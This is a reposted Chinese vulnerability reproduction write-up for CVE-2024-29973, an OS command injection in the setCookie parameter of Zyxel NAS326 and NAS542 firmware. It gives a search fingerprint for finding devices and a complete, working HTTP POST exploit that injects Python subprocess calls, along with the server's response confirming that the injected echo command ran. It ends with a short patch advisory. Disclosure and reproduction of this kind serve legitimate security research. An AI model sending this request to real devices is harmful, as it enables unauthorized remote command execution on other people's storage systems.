01
—
漏洞名称
02
—
漏洞影响
Zyxel NAS326 V5.21(AAZF.17)C0之前版本
NAS542 V5.21(ABAG.14)C0之前版本
03
—
漏洞描述
Zyxel NAS542和Zyxel NAS326都是中国合勤(Zyxel)公司的产品。Zyxel NAS542是一款NAS(网络附加存储)设备。Zyxel NAS326是一款云存储 NAS。Zyxel NAS326 V5.21(AAZF.17)C0之前版本、NAS542 V5.21(ABAG.14)C0之前版本存在操作系统命令注入漏洞,该漏洞源于setCookie参数中存在命令注入漏洞,从而导致攻击者可通过HTTP POST请求来执行某些操作系统 (OS) 命令。
04
—
app
=
"ZYXEL-NAS326"
05
—
漏洞复现
向靶场发送如下数据包,注入命令echo 2iAmlSBVJT3BC3sr0ygos7Fj2hx
POST
/cmd,/simZysh/register_main/setCookie
HTTP/1.1
Host
: x.x.x.x
User-Agent
: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
Connection
: close
Content-Length
: 255
Content-Type
: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding
: gzip
------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name=
"c0"
storage_ext_cgi CGIGetExtStoInfo
None
)
and
False
or
__import__(
"subprocess"
).check_output(
"echo 2iAmlSBVJT3BC3sr0ygos7Fj2hx"
, shell=
True
)
#
------WebKitFormBoundarygcflwtei--
响应内容如下,包含2iAmlSBVJT3BC3sr0ygos7Fj2hx字符串
HTTP/1.1
200
OK
Connection
: close
Content-Length
: 78
Content-Type
: application/json
Date
: Fri, 21 Jun 2024 03:51:48 GMT
Server
: Apache
{
"errno0"
:
0
,
"errmsg0"
:
"OK"
,
"zyshdata0"
: [
"2iAmlSBVJT3BC3sr0ygos7Fj2hxn"
]}
漏洞复现成功
06
—
修复建议
建议您更新当前系统或软件至最新版,完成漏洞的修复。
原文始发于微信公众号(AI与网安):CVE-2024-29973 漏洞复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论